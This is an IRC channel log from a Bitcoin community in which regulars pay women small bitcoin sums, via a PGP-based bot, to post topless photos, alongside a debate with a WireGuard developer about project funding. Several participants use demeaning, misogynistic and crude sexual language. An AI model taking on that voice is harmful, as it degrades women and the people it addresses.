1798334;1523648013;BingoBoingo;*esperando 1798335;1523648016;deedbot;Get your OTP: http://p.bvulpes.com/pastes/vG38a/?raw=true 1798336;1523648028;thatbitchlola;im getting another girl right now! 1798337;1523648079;mircea_popescu;thatbitchlola you can voice yourself now ; say !!up to deedbot in a pm, then !!v the string it gives you (have to decrypt first) 1798338;1523648112;thatbitchlola;okay 1798339;1523648915;thatbitchlola;how long does this take to go through usually? 1798340;1523648982;BingoBoingo;thatbitchlola: trinque usually processes withdrawals once a day. 1798341;1523649006;thatbitchlola;it isn't even showing in my balance tho 1798342;1523649105;deedbot;http://qntra.net/2018/04/aussies-bringing-shuttered-power-plant-back-online-for-electricity-sales-to-miners/ << Qntra - Aussies Bringing Shuttered Power Plant Back Online For Electricity Sales To Miners 1798343;1523649408;mircea_popescu;thatbitchlola not this long usually ; im waiting for trinque to show up there's something weird going on. 1798344;1523649411;mircea_popescu;!!up kori_ 1798345;1523649412;deedbot;kori_ voiced for 30 minutes. 1798346;1523649424;kori_;tits4bits? 1798347;1523649439;mircea_popescu;kori_ d3916aaa ; you got half an hour. 1798348;1523649454;ben_vulpes;mircea_popescu: are you verifying the otps in private? 1798349;1523649460;mircea_popescu;yes. 1798350;1523649478;ben_vulpes;only guess i got 1798351;1523649481;mircea_popescu;zx2c4 talk to me here plox. 1798352;1523649494;zx2c4;hello mircea_popescu 1798353;1523649500;mircea_popescu;how goes ? 1798354;1523649509;zx2c4;it does go 1798355;1523649510;mircea_popescu;are you here for the tits ? :D 1798356;1523649533;zx2c4;wondering - how might i achieve great wealth and donations for wireguard from you/trilema? 1798357;1523649540;BingoBoingo;zx2c4: You spoke a lot yesterday, but neglected an important question: Who is your daddy and what does he do? 1798358;1523649555;mircea_popescu;BingoBoingo he's the wiredguard guy. 1798359;1523649572;BingoBoingo;mircea_popescu: Sure, but that doesn't explain his daddy 1798360;1523649582;mircea_popescu;zx2c4 i don't get it, you just got a coin, should last you a while neh ? 1798361;1523649591;zx2c4;my daddy is /proc/kcore and he's connected to a debugger. 1798362;1523649606;mircea_popescu;almost exactly alf's lieage! 1798363;1523649614;zx2c4;mircea_popescu: some time, though of course not enough to support a whole project for a whole year. i'm wondering about great flowering riches 1798364;1523649642;mircea_popescu;why are you doing systems programming if you're after great flowering riches ? go into business. 1798365;1523649656;zx2c4;alas 1798366;1523649664;zx2c4;i like systems programming in crypto 1798367;1523649665;zx2c4;alas. 1798368;1523649678;mircea_popescu;so then do what you like. you'll never be rich, but with some luck you'll never die 1798369;1523649687;mircea_popescu;where luck mostly evaluates to "making sense to people in power". 1798370;1523649709;zx2c4;i wasn't planning on immortality, but if you say so... 1798371;1523649715;mircea_popescu;die of hunger* 1798372;1523649726;BingoBoingo;Anything after 40 is bonus time anyways 1798373;1523649730;zx2c4;so, slightly more disappointing of a prospect 1798374;1523649776;douchebag;mircea_popescu I'm talking to thatbitchlola right now, apparently she got paid before she registered her PGP key 1798375;1523649781;douchebag;could that be the reason? 1798376;1523649782;mircea_popescu;zx2c4 you pretty much work alone on the thing, don;t you ? 1798377;1523649792;mircea_popescu;douchebag it could but it's weird because i checked. 1798378;1523649804;zx2c4;mircea_popescu: for the most part, though trying to get some interns this summer via GSoC 1798379;1523649814;mircea_popescu;douchebag maybe i checked too late. anyway, ima wait for the man to come by and set this straight. 1798380;1523649835;mircea_popescu;zx2c4 how's that work out btw ? i vaguely considered it for eulora but never actually bothered to push the point. 1798381;1523649892;zx2c4;mostly really under-qualified applicants. but if you already know students who are smart, or have some better means of reaching out to them than just the gsoc landing page, then it's possible to hand select people you'd like to work on stuff, and give them summer funding. 1798382;1523649915;mircea_popescu;except of course if they're also dreaming of great towering riches in exchange for doing what they were going to do anyway. 1798383;1523649939;zx2c4;yea. it pays worse than real internships. so the pool of students willing to do it is smaller than what you'd wish 1798384;1523649980;zx2c4;large part of the student motivation is the mentoring, i suppose 1798385;1523649982;mircea_popescu;kinda why i never bothered ; basically the whole "tech" imperial flea circus is this game of trying to outsource your costs on a sucker. whether it's ugc or gsoc, or "investing" or w/e else. 1798386;1523650030;zx2c4;which is why real funding for wireguard would be so much better 1798387;1523650043;mircea_popescu;i don't follow the logic ? 1798388;1523650050;zx2c4;rare occurrence with FLOSS though 1798389;1523650072;zx2c4;proper funding would mean fewer "suckers" 1798390;1523650083;mircea_popescu;no, it would just mean you'd be the sucker. 1798391;1523650088;kori_;https://usercontent.irccloud-cdn.com/file/ZYiYA4UM/image.png 1798392;1523650090;zx2c4;how come? 1798393;1523650095;mircea_popescu;understand, being poor is like being skinny : no lion running after you. 1798394;1523650115;mircea_popescu;zx2c4 you ever read http://trilema.com/2015/you-know-what-gets-no-airplay-unflattering-truth/ ? it'd explain the matter thoroughly. 1798395;1523650135;mircea_popescu;!!key kori_ 1798396;1523650137;deedbot;http://wot.deedbot.org/D801305F92A4A11B41D4536D106F3C9489215AE2.asc 1798397;1523650141;mircea_popescu;!!pay kori_ 0.02 1798398;1523650148;deedbot;Get your OTP: http://p.bvulpes.com/pastes/10hUX/?raw=true 1798399;1523650154;mircea_popescu;kori_ sooo... when are you coming to costa rica ? 1798400;1523650157;kori_;Thanks dear 1798401;1523650178;kori_;Married 🤣 1798402;1523650209;mircea_popescu;ehehe aite. 1798403;1523650217;kori_;But open 1798404;1523650223;mircea_popescu;well which is it ? 1798405;1523650235;zx2c4;mircea_popescu: this article is about making a company right? i'm not doing that. im just writing painstaking careful code and giving it to the world for free 1798406;1523650247;mircea_popescu;zx2c4 it's more generally about how the whole sucker business works. 1798407;1523650255;zx2c4;ahh 1798408;1523650280;mircea_popescu;i promise you it's worth the read ; if you read it and think otherwise you can come here an' complain. 1798409;1523650318;BingoBoingo;So many experiments in programming the wetware today! 1798410;1523650337;mircea_popescu;and such diversity! 1798411;1523650352;mircea_popescu;costa rica is starting to rub off on me, biodiversidad Y TECHNODIVERSIDAD! 1798412;1523650365;zx2c4;i still dont see how this applies to my situation, 1798413;1523650369;zx2c4;but interesting read nonetheless 1798414;1523650390;mircea_popescu;zx2c4 it relates specifically to the "which is why real funding for wireguard would be so much better". no, it wouldn 't be. you'd just end up trapped in some sort of bullshit deal. 1798415;1523650481;zx2c4;i'd be wary of any 'deal' that's different from: 'i'm given money. you're given warm feelings of having helped the internet.' 1798416;1523650525;mircea_popescu;zx2c4 understand, this self-flattering notion that you're in control is bunk. you're in no position to be in control in that sense. all that you're filtering for by that mechanism is "bullshit deal i don't comprehend". which... of course you would be. 1798417;1523650551;mircea_popescu;evolution at work, the reason the fish doesn't remove the bloodsucker is that the bloodsucker is so designed as to sit in the fish's blind spot. 1798418;1523650594;zx2c4;to put differently, if 2000 BTC suddenly showed up in 1ASnTs4UjXKR8tHnLi9yG42n42hbFYV2um, I'd be quite happy and don't think i'd be worse off 1798419;1523650595;mircea_popescu;douchebag it's almost certainly due to their not having had keys ; because otherwise payments work. 1798420;1523650608;mircea_popescu;zx2c4 you'd be terribly worse off, and so would be the bitcoin ecosystem. 1798421;1523650644;zx2c4;the latter point -- because you suppose i'd convert it to EUR and that'd harm BTC in general? 1798422;1523650648;mircea_popescu;and in exactly the way a toddler suddenly getting 2000 Nm impulse would be worse off. 1798423;1523650662;mircea_popescu;zx2c4 no, because you'd do something stupid. 1798424;1523650670;zx2c4;oh, i really don't think that'd be the case 1798425;1523650679;mircea_popescu;of course you don't. that's a necessary ingredient. 1798426;1523650701;douchebag;yeah because SluttyDiamond is having the same problem 1798427;1523650719;zx2c4;i'm pretty certain no calamity would come of it... 1798428;1523650747;mircea_popescu;zx2c4 this certainty is borne out of nothing in particular. i've been sitting here for many years, watching many kinds and sorts of people getting power beyond their means. 1798429;1523650816;douchebag;once trinque vertifies that's the issue you'll repay them mircea_popescu - correct ? 1798430;1523650820;zx2c4;i dont think it'd translate into any kind of significant "power beyond my means" 1798431;1523650868;zx2c4;i realize that's the classic trope -- it's the kind of thing you read about all the time 1798432;1523650875;zx2c4;but it clearly doesn't happen with _all people_ 1798433;1523650879;mircea_popescu;douchebag yes. 1798434;1523650912;mircea_popescu;zx2c4 looky, the only reason you want "an infinity of monyz" is "so that i don't have to tihnk of monyz anymore", which is simply the way you've rephrased "so i can be stupid with impunity" in a way to meet your blindspots. 1798435;1523650963;zx2c4;the reason is actually, "so that i can have a fixed income without any concrete labor obligations" 1798436;1523650964;mircea_popescu;if you want a lot of monyz, business is the only way. there, you risk losing it, and you learn what it is and how it works. if that's not of your interest, you can never have it. period. even if you think you do, for whatever reason. are you familiar with the all-amusing ers example ? 1798437;1523650972;mircea_popescu;zx2c4 that's the same thing. 1798438;1523651006;zx2c4;how does that necessarily lead to "being stupid"? what if i just choose to raise a boring family and live a boring life? 1798439;1523651016;mircea_popescu;what's dumber than that ?! 1798440;1523651024;zx2c4;hahah 1798441;1523651035;mircea_popescu;money has specific needs of you, duh. what, you think it cares about your family ? 1798442;1523651066;mircea_popescu;you have to answer questions, and answer them correctly, and for ~all time. 1798443;1523651094;zx2c4;that seems fine 1798444;1523651127;zx2c4;i know a lot of rich people with trust funds set up by their ancestors. they receive fixed income every month, and otherwise aren't hassled 1798445;1523651147;mircea_popescu;and i know jewish cemeteries with upkept graves. what's the difference ? 1798446;1523651160;mircea_popescu;you're not about to tell me these shambling ruins are people or something. 1798447;1523651162;mircea_popescu;!!up lauren22 1798448;1523651163;deedbot;lauren22 voiced for 30 minutes. 1798449;1523651177;lauren22;Hi, boobs? 1798450;1523651194;mircea_popescu;aite lauren22 ; 961325385 ; you got half hour. 1798451;1523651226;zx2c4;one difference is that the ruins aren't people, not that they are, obviously. not sure i'm getting your rhetorical point... 1798452;1523651259;mircea_popescu;but what is the difference ? some ancestor decided to preserve his degeneration. as a rock or as a grandson, whatever. are they more than this ? 1798453;1523651309;mircea_popescu;occasionally hollywood nuts leave pets behind in the ~same situation also. they get a daily pellet and so on. 1798454;1523651353;zx2c4;the point is that the grandson rarely has problems answering correctly to too many questions that necessitate correct responses 1798455;1523651368;mircea_popescu;what do you think the ur-question is ? 1798456;1523651392;zx2c4;not sure 1798457;1523651394;mircea_popescu;http://trilema.com/2017/Кто-ты-по-жизни/ 1798458;1523651432;zx2c4;great seinfeld episode 1798459;1523651483;mircea_popescu;"What were you in this life ?" is no small matter. and yes it requires a correct answer ; what's the trust fund do for that ? 1798460;1523651576;zx2c4;some rich kids seem to use their funds to pursue interesting things and deepen their character with those experiences. others waste away their time. 1798461;1523651605;mircea_popescu;and in all cases the answer comes back again and again, "i was an inadequate successor to a greater past". 1798462;1523651650;mircea_popescu;tis infinitely better to be a promising systems developer than to be a guy who wasn't cool enough for the chunk of bitcoin he got. 1798463;1523651706;douchebag;hey mircea_popescu do I get 0.01 for finding a flaw with deedbot again :D 1798464;1523651722;douchebag;since it probably subtracted from your balance 1798465;1523651724;zx2c4;i don't think so. plenty of people with the necessary leisure study or create literature, philosophy, music, art -- great aspects of civilization for which there isn't always an immediate economic incentive 1798466;1523651757;mircea_popescu;douchebag i checked and it did not substract! 1798467;1523651769;douchebag;oh 1798468;1523651769;mircea_popescu;zx2c4 so where's the 500 rembrandts ? (do you know the reference ?) 1798469;1523651776;douchebag;well 1798470;1523651781;douchebag;let me ask both of them 1798471;1523651792;douchebag;or actually 1798472;1523651805;zx2c4;for example, i've spent my life studying greek philosophy and playing jazz music, and it doesn't pay anything. hence programming. but the economics of those activities doesn't really relate to their quality or importance 1798473;1523651806;douchebag;!!key thatbitchlola 1798474;1523651808;deedbot;http://wot.deedbot.org/734A00DE7C6C678CDA9952A16DF429AB89BA2F89.asc 1798475;1523651819;douchebag;!!key SluttyDiamond 1798476;1523651821;deedbot;http://wot.deedbot.org/85AD141CCB697037C12BADEA5180BCB42F6EA0D9.asc 1798477;1523651826;douchebag;they both have keys now 1798478;1523651834;mircea_popescu;zx2c4 but you are aware how the economics of either greek philosophy or jazz music worked irl ? 1798479;1523651858;lauren22;https://usercontent.irccloud-cdn.com/file/iDfnWOy9/image.jpg 1798480;1523651859;zx2c4;i'm not saying everyone with leisure _does_ do something worthwhile with it. but you cant deny that leisure is in many cases a necessary precondition for many great aspects of civilization 1798481;1523651887;mircea_popescu;but i affirm that you equivocate "lesiure", in that your idea of leisure is never what occured when actual civilisation was produced. 1798482;1523651917;mircea_popescu;who do you think the most notable of the greeks ? 1798483;1523651963;zx2c4;yea, sure, im pretty certain of what it'd take to be financially viable in either philosophy or jazz music. that's not something universally available and there's a lot of luck involved, however, and even then it's a pretty rough life. it's not even available to all types of philosophy study and all types of jazz music. 1798484;1523651973;zx2c4;i enjoy plato most 1798485;1523651991;thatbitchlola;wait so you figured out why it didn't send? 1798486;1523651992;mircea_popescu;zx2c4 so i take it you're familiar with history as retold by the esl : how socrates died, and how plato did not die. 1798487;1523652001;mircea_popescu;do you understand the terrible shame plato was, for socrates ? 1798488;1523652013;mircea_popescu;thatbitchlola probably, yes. 1798489;1523652037;zx2c4;not sure i have the same interpretation of phaedo as you 1798490;1523652065;zx2c4;im being interrupted now, but ill be back in a while to continue this 1798491;1523652085;mircea_popescu;nevermind phaedo. socrates tried, his whole life, to make people capable of standing on their own. and his products, among which plato is a minor outlier, held that bloody affair, where most of the city was gutted. 1798492;1523652087;lauren22;Sorry did photo upload work? 1798493;1523652091;mircea_popescu;it was, make no mistake, an exact greek shoah. 1798494;1523652118;mircea_popescu;and aristotle had to face this desert before his eyes : here, you did what you thought best, and here's what came of it, your students trying to force innocent men to take part inb murders to avoid retribution. 1798495;1523652129;mircea_popescu;this scandal is why aristotle didn't even fucking want plato's disgusting silver. 1798496;1523652163;mircea_popescu;and now think -- that for his great merits, aristotle was in fact given by the city "2000 btc", ie exactly what you mean by it, "sufficient money so as i can be a righteous man alone". 1798497;1523652168;mircea_popescu;you can't fucking BE righteous alone. 1798498;1523652179;mircea_popescu;lauren22 yes 1 sec 1798499;1523652190;mircea_popescu;!!pay lauren22 0.02 1798500;1523652196;deedbot;Get your OTP: http://p.bvulpes.com/pastes/3hOSn/?raw=true 1798501;1523652201;lauren22;❤️ 1798502;1523652206;mircea_popescu;what do you do for a living ? 1798503;1523652224;thatbitchlola;would you be able to pay me and sluttydiamond now that we added our keys? 1798504;1523652231;lauren22;Watch over my 2 children until they start school 1798505;1523652237;mircea_popescu;thatbitchlola im waiting for trinque to show up ; won't be very long. 1798506;1523652246;mircea_popescu;lauren22 is it fun ? 1798507;1523652246;lauren22;Homemaker I suppose 1798508;1523652287;mircea_popescu;imagine, if you only had 100`000 more pairs of tits you could write cryptographic client-server protocols. 1798509;1523652298;mircea_popescu;and we'd call you shiva 1798510;1523652310;lauren22;Lol 1798511;1523652332;lauren22;How would that work? 1798512;1523652348;mircea_popescu;well that we haven't figured out yet! 1798513;1523652413;lauren22;Cloudflare & lava lamps? Live in the flesh? 1798514;1523652459;mircea_popescu;zx2c4 i'm sorry, i got confused. " this scandal is why socrates didn't even fucking want plato's disgusting silver. and now think -- that for his great merits, socrates was in fact given by the city "2000 btc"" is what i meant. 1798515;1523652472;mircea_popescu;lauren22 why lava lamps ? 1798516;1523652487;lauren22;Have you not seen how cloudflare does it? 1798517;1523652492;mircea_popescu;ahahahaha 1798518;1523652494;lauren22;Lavalamps 1798519;1523652512;mircea_popescu;now modesty aside, considering i've seen your tits : what DO you do with yourself ? 1798520;1523652550;lauren22;Heh, do in what sense? 1798521;1523652566;mircea_popescu;well, in the sense of, do you bash ? do you c ? do you ada ? do you what ? 1798522;1523652576;trinque;so, the girls are bitching they don't have a balance, after having run withdrawal requests, or what? 1798523;1523652592;mircea_popescu;trinque i sent payments they didn't have keys yet, i don't want to resent lest it ends up doublespent. 1798524;1523652596;mircea_popescu;unless you say to. 1798525;1523652601;lauren22;Oh, I started in CS, did not finish though. 1798526;1523652609;trinque;nothing happens if they weren't registered 1798527;1523652611;mircea_popescu;lauren22 so how do you know cloudflare is a joke ? 1798528;1523652619;mircea_popescu;trinque resend then ? 1798529;1523652621;lauren22;Youtube 1798530;1523652632;trinque;sure, if bot says nothing, bot did nothing 1798531;1523652633;lauren22;Video, one magazine did a piece about it 1798532;1523652635;mircea_popescu;good for you. 1798533;1523652645;mircea_popescu;!!pay thatbitchlola 1798534;1523652649;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Vvgzj/?raw=true 1798535;1523652677;mircea_popescu;!!pay thatbitchlola 0.02 1798536;1523652682;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Fec4q/?raw=true 1798537;1523652683;mircea_popescu;!!pay SluttyDiamond 0.02 1798538;1523652694;deedbot;Get your OTP: http://p.bvulpes.com/pastes/4EFdz/?raw=true 1798539;1523652724;mircea_popescu;lauren22 would you like to learn to computer ? 1798540;1523652747;lauren22;Mobile, maybe. 1798541;1523652751;mircea_popescu;why mobile ? 1798542;1523652757;lauren22;More utility for most 1798543;1523652765;mircea_popescu;ugh 1798544;1523652768;trinque;http://btcbase.org/log/2018-04-13#1798463 << why don't you do some actual work, then 1798545;1523652768;a111;Logged on 2018-04-13 20:35 douchebag: hey mircea_popescu do I get 0.01 for finding a flaw with deedbot again :D 1798546;1523652773;lauren22;Everyone has a computer in pocket/purse 1798547;1523652800;mircea_popescu;why not program ticks then ? 1798548;1523652807;mircea_popescu;most herbivores have a bunch. 1798549;1523652823;trinque;douchebag: and when you bring these chicks in here, tell them A) register, B) don't expect trinque hops off what he was doing to immediately cut txn for their precious cuntlet C) once they withdraw, balance is 0 again, because duh 1798550;1523652827;lauren22;I wonder how laptop sales have done since modern phones, many friends don't even own laptop anymore. 1798551;1523652839;lauren22;iPad/iPhone/Android 1798552;1523652846;mircea_popescu;lauren22 pretty much everyone here uses desktops and rackables only. or almost. 1798553;1523652858;douchebag;trinque: I'll do actual work once I have a machine that can be on 24/7 1798554;1523652893;*;trinque checks printer, holy fuck, lol 1798555;1523652898;mircea_popescu;lmao. 1798556;1523652905;mircea_popescu;how's the sluttest coming along ? 1798557;1523652911;mircea_popescu;im sorry, i mean stresstest. 1798558;1523652915;trinque;goin great! 1798559;1523652919;mircea_popescu;groin great ? 1798560;1523652930;lauren22;You all married/kids? 1798561;1523652943;trinque;lol 1798562;1523653010;mircea_popescu;!!up lauren22 1798563;1523653011;deedbot;lauren22 voiced for 30 minutes. 1798564;1523653036;mircea_popescu;lauren22 ben_vulpes has a coupla, the other married guy left ; i keep slavegirls, most everyone else is vaguer about it. 1798565;1523653055;lauren22;Do you want a large family? 1798566;1523653059;mircea_popescu;ah, diana_coman has one too. 1798567;1523653063;mircea_popescu;lauren22 as long as i choose it, yes. 1798568;1523653093;lauren22;Yes, not worth getting trapped in a bad relationship over kid 1798569;1523653122;mircea_popescu;no, that's not what i mean. i mean i don't want to play genitorial roulette, i'd rather choose the new members of this family myself. 1798570;1523653134;lauren22;Ahh, genetic selection? 1798571;1523653137;mircea_popescu;see http://trilema.com/2018/traditional-family-vs-the-harem-a-comparative-study/ ; it's expounded 1798572;1523653161;lauren22;Eugenics ? 1798573;1523653165;mircea_popescu;nah. 1798574;1523653181;mircea_popescu;eugenics is dumb. 1798575;1523653251;lauren22;I have only heard it referenced with Hitler stuff mostly. 1798576;1523653311;mircea_popescu;eugenics is the proposition that you can pick good genotypes on the basis of fenotypic cues. this is nonsense, as the genotype is way way deeper than the fenotype. see also http://trilema.com/2015/the-genetics-of-intelligence/ for a broader discussion. 1798577;1523653346;lauren22;I remember the beans from elementary school somewhat 1798578;1523653695;*;danielpbarron has no wives and no kids 1798579;1523653730;mircea_popescu;and no problems ? 1798580;1523653741;danielpbarron;doing alright 1798581;1523653976;mircea_popescu;!!up ErisMoon 1798582;1523653977;deedbot;ErisMoon voiced for 30 minutes. 1798583;1523653984;ErisMoon;I'm here to show tits 1798584;1523654045;douchebag;im still getting her gpg setup, so obv don't pay her until after she gets that all registered 1798585;1523654062;douchebag;but she's ready 1798586;1523654109;mircea_popescu;ErisMoon a3a128e3 ; you got half hour. 1798587;1523654164;mircea_popescu;will the universe run out of tits before mp runs out of bits ; or will mp run out of bits before the universe runs out of tits ? THE QUESTIONS OF OUR TIME 1798588;1523654239;ErisMoon;!!register http://p.bvulpes.com/pastes/glz7g/?raw=true 1798589;1523654243;deedbot;FB73E512AEAE6853CA0534A84C1A2805CDEBA21C registered as ErisMoon. 1798590;1523654314;ErisMoon;okay no problemo 1798591;1523654651;ErisMoon;https://i.imgur.com/yboOELF.jpg 1798592;1523654658;ErisMoon;enjoy 1798593;1523654963;ErisMoon;mircea_popescu is this good? 1798594;1523655313;douchebag;That was awfully quick, nice job! 1798595;1523655332;mircea_popescu;tis fine 1798596;1523655337;mircea_popescu;!!pay ErisMoon 0.02 1798597;1523655344;deedbot;Get your OTP: http://p.bvulpes.com/pastes/aRNK4/?raw=true 1798598;1523655374;mircea_popescu;so what's eris moon come from ? 1798599;1523655417;mircea_popescu;!!up jossi 1798600;1523655418;deedbot;jossi voiced for 30 minutes. 1798601;1523655423;jossi;boob :) 1798602;1523655432;mircea_popescu;lol 1798603;1523655441;mircea_popescu;jossi 128f55d7 ; you got halfhour. 1798604;1523655684;mircea_popescu;!!up Hobbyboycg 1798605;1523655685;deedbot;Hobbyboycg voiced for 30 minutes. 1798606;1523656469;jossi;https://usercontent.irccloud-cdn.com/file/Ud3O3Yko/image.jpg 1798607;1523656522;mircea_popescu;!!pay jossi 0.02 1798608;1523656537;mircea_popescu;!!key jossi 1798609;1523656539;deedbot;http://wot.deedbot.org/A7275AB459A14E19FCDDD310465F4E68004047DE.asc 1798610;1523656552;jossi;:) 1798611;1523656565;mircea_popescu;jossi that's a nice interior, are you like rich ? 1798612;1523656579;jossi;boutique 1798613;1523656588;mircea_popescu;ah, you work there ? 1798614;1523656595;jossi;we sell to the rich, im not rich :( 1798615;1523656632;trinque;eh mircea_popescu internet just went out where the wallet box is located. 1798616;1523656636;mircea_popescu;lol. so next time rich dood walks in, be all like "0.11 btc for this bed as it is, sir ; or 0.20 as a package deal, with me in it" 1798617;1523656639;trinque;ping you when it's back up 1798618;1523656643;mircea_popescu;trinque ty 1798619;1523656651;mircea_popescu;jossi slight delay apparently. 1798620;1523656665;jossi;mircea_popescu: its a lot of baby stuff unfortunately lol 1798621;1523656679;mircea_popescu;do you also go to school ? 1798622;1523656681;jossi;Would be pretty awkward 1798623;1523656698;jossi;I did for fashion 1798624;1523656703;jossi;Well started 1798625;1523656705;mircea_popescu;didn't pan out ? 1798626;1523656710;jossi;:x 1798627;1523656715;mircea_popescu;aww! 1798628;1523656723;mircea_popescu;say, do you have any friends that draw well ? 1798629;1523656732;jossi;I have 2 years left 1798630;1523656746;jossi;I did in school, but not currently 1798631;1523656753;mircea_popescu;aha. 1798632;1523656788;jossi;Tell me about you 1798633;1523656797;mircea_popescu;what would you like to know ? 1798634;1523656815;jossi;Hm 1798635;1523656829;jossi;What is mircea_popescu ? of what origin? 1798636;1523656836;mircea_popescu;the name is romanian. 1798637;1523656836;jossi;The name itself 1798638;1523656856;jossi;Ah Romanian women, you must be in heaven. 1798639;1523656864;mircea_popescu;i live in costa rica. 1798640;1523656893;mircea_popescu;but amusingly enough, you look pretty romanian yourself. where'you from ? 1798641;1523656898;jossi;Every Roma girl I've known has been super good looking somehow 1798642;1523656922;jossi;Ukrainian and French 1798643;1523656950;mircea_popescu;and do you live in ukraina or france ? 1798644;1523656972;jossi;Oh no, just linage 1798645;1523656981;jossi;Live in NYC 1798646;1523656989;mircea_popescu;from what i hear ukraina sucks these days. how's nyc ? 1798647;1523657012;jossi;It has its nice areas, but you have to really like city life. 1798648;1523657023;mircea_popescu;what's city life like these days ? 1798649;1523657024;jossi;I wouldn't mind a more suburban area 1798650;1523657033;jossi;Police, everywhere 1798651;1523657038;mircea_popescu;heh 1798652;1523657058;jossi;Trump had the city messed up for quite a bit too 1798653;1523657092;jossi;With the extra patrolmen and blockades, but mostly done now 1798654;1523657102;mircea_popescu;yeah, i can't imagine how i'd put up with the nonsense. 1798655;1523657118;jossi;Well, mostly wife's fault 1798656;1523657121;mircea_popescu;here, the police are lovely chaps. mostly give out directions. 1798657;1523657148;jossi;Poor Melania seems pretty sad looking lately 1798658;1523657165;mircea_popescu;you figure old man trump's penis pump finally gave up the ghost ? 1798659;1523657178;jossi;HAH! 1798660;1523657206;jossi;I suspect he only works with the right cocktail of pills in him lol 1798661;1523657214;mircea_popescu;you just said cock ?! 1798662;1523657228;mircea_popescu;!!up jossi 1798663;1523657229;deedbot;jossi voiced for 30 minutes. 1798664;1523657231;jossi;I see what you did there lol 1798665;1523657244;jossi;But I don't want to judge the man 1798666;1523657246;thatbitchlola;wait so 1798667;1523657252;mircea_popescu;!!rate jossi 1 ukrainian-french girl working for the rich of nyc. wiwa la rebolucion! 1798668;1523657252;jossi;If he likes cock, *shrug* 1798669;1523657255;deedbot;Get your OTP: http://p.bvulpes.com/pastes/NXa7h/?raw=true 1798670;1523657264;thatbitchlola;when is my bitcoin going to appear in my wallet 1798671;1523657269;thatbitchlola;if it went offline 1798672;1523657283;mircea_popescu;thatbitchlola today or tomorrow. something like trhat. 1798673;1523657312;thatbitchlola;okay it said after i did everything 1798674;1523657322;thatbitchlola;0.02 will be sent to my address 1798675;1523657329;thatbitchlola;after going through the process 1798676;1523657332;mircea_popescu;cool. takes 24h or elss. 1798677;1523657345;thatbitchlola;oki! 1798678;1523657351;mircea_popescu;jossi so other than boutique and not going to school anymore, what do you do ? 1798679;1523657380;jossi;This pays well, not the most stimulating job but gives me time to do other things 1798680;1523657386;mircea_popescu;like ? 1798681;1523657406;jossi;Mostly browse reddit and watch youtube lol 1798682;1523657418;mircea_popescu;o hey, check it out zx2c4 ! leisure works! 1798683;1523657428;mircea_popescu;that poor guy. little did he know... 1798684;1523657436;jossi;Heh whats the story there? 1798685;1523657448;mircea_popescu;jossi http://btcbase.org/log/2018-04-13#1798480 1798686;1523657448;a111;Logged on 2018-04-13 20:37 zx2c4: i'm not saying everyone with leisure _does_ do something worthwhile with it. but you cant deny that leisure is in many cases a necessary precondition for many great aspects of civilization 1798687;1523657460;mircea_popescu;you can follow the log on the website, if you click the link 1798688;1523657545;jossi;Oh, I am one that doesn't do the worth while stuff :o 1798689;1523657569;mircea_popescu;why not ? 1798690;1523657583;jossi;Good question 1798691;1523657593;jossi;Not found my "thing" yet 1798692;1523657597;mircea_popescu;why thank you. and the good answer ? 1798693;1523657602;mircea_popescu;mh. what do you mean "your thing" 1798694;1523657640;jossi;Something that I enjoy and is stimulating & enriches 1798695;1523657688;mircea_popescu;that must suck. 1798696;1523657707;*;mircea_popescu shall bbs. 1798697;1523657751;trinque;got ya thatbitchlola; going to be moving the wallet to pizarro hosting soon as I can. 1798698;1523657794;jossi;trinque: I may have issue, deedbot not responding 1798699;1523657874;trinque;jossi: http://btcbase.org/log/2018-04-13#1798615 1798700;1523657874;a111;Logged on 2018-04-13 21:57 trinque: eh mircea_popescu internet just went out where the wallet box is located. 1798701;1523657899;trinque;gonna have to wait until that box comes back. 1798702;1523657926;jossi;Ah, Got you 1798703;1523657928;trinque;transparent ploy to get you to hang out with us longer, eh? 1798704;1523657943;jossi;Lol 1798705;1523657963;jossi;Tell me about this place, if you had to summarize in a sentence or 2 1798706;1523657978;jossi;Elevator pitch 1798707;1523658333;douchebag;hey trinque but the transactions that already got processed and everything 1798708;1523658343;douchebag;and are just waiting for manual processing 1798709;1523658356;douchebag;you got them already? 1798710;1523658370;trinque;yeah, everything that gave a response to somebody got through; no worries 1798711;1523658381;trinque;just dealing with shitty internets for the next howeverlong 1798712;1523658439;douchebag;alright, when do you think you'll get to processing them 1798713;1523658481;mircea_popescu;jossi do you see the topic ? 1798714;1523658591;trinque;I was gonna link http://trilema.com/2016/cia-factbook-the-most-serene-republic/ 1798715;1523658741;mircea_popescu;also works. 1798716;1523658749;mircea_popescu;!!help 1798717;1523658749;deedbot;http://deedbot.org/help.html 1798718;1523658979;shinohai;elevator pitch lol 1798719;1523659000;*;shinohai is off to have ice cream and brandy for birthday 1798720;1523659070;mircea_popescu;happy bday 1798721;1523659073;mircea_popescu;!!up jossi 1798722;1523659074;deedbot;jossi voiced for 30 minutes. 1798723;1523660139;hanbot;http://thewhet.net << lastest post (mod_rewrite ergo links not yet live, or i'd link y'all directly) is mp-wp_genesis. esthlos and anyone else who was waiting on this is encouraged to test it out --setting up a test blog-within-a-blog is gonna be a royal pita and cause yet further delays, so please do try it out, lemme know how it goes. 1798724;1523660238;ben_vulpes;nifty hanbot 1798725;1523660264;ben_vulpes;looking forward to giving it a crack myself 1798726;1523662063;mircea_popescu;jossi to voice yourself, say !!up to deedbot in a pm and then !!v the string it gives you (decrypt its message) 1798727;1523663330;*;mircea_popescu takes advantage of a momentary lull to update the titpost lol 1798728;1523663466;esthlos;nice hanbot, will play around and get back to you on Sunday 1798729;1523663476;esthlos;!!key hanbot 1798730;1523663478;deedbot;http://wot.deedbot.org/EA0FAD90985B3025576A5061454B0FC0BC07B87E.asc 1798731;1523663516;hanbot;gl! 1798732;1523663560;shinohai;http://thewhet.net/2018/04/mp-wp-genesis/ <<< 404 1798733;1523663625;shinohai;oh i found it nm 1798734;1523665440;BingoBoingo;http://trilema.com/2016/cia-factbook-the-most-serene-republic/ << Maybe the people and society section needs updating? Maybe it doesn't? Glories of no formal surveys! 1798735;1523666143;mircea_popescu;it's the way of cia factbooks to be half a decade out of date. 1798736;1523666155;mircea_popescu;"these facts were factual at some point" 1798737;1523666183;BingoBoingo;Ambiguity ftw! 1798738;1523667003;douchebag;hey trinque 1798739;1523667020;douchebag;I have some girls who are gonna wanna show tits tomorrow 1798740;1523667029;douchebag;will the bot be back up and working by then? 1798741;1523667345;trinque;most likely yes. there's an ISP outage. 1798742;1523667370;trinque;oughta be back on later today, but the ministry of comcast, who knows 1798743;1523667396;trinque;relatedly, I'm going to instate a withdrawal 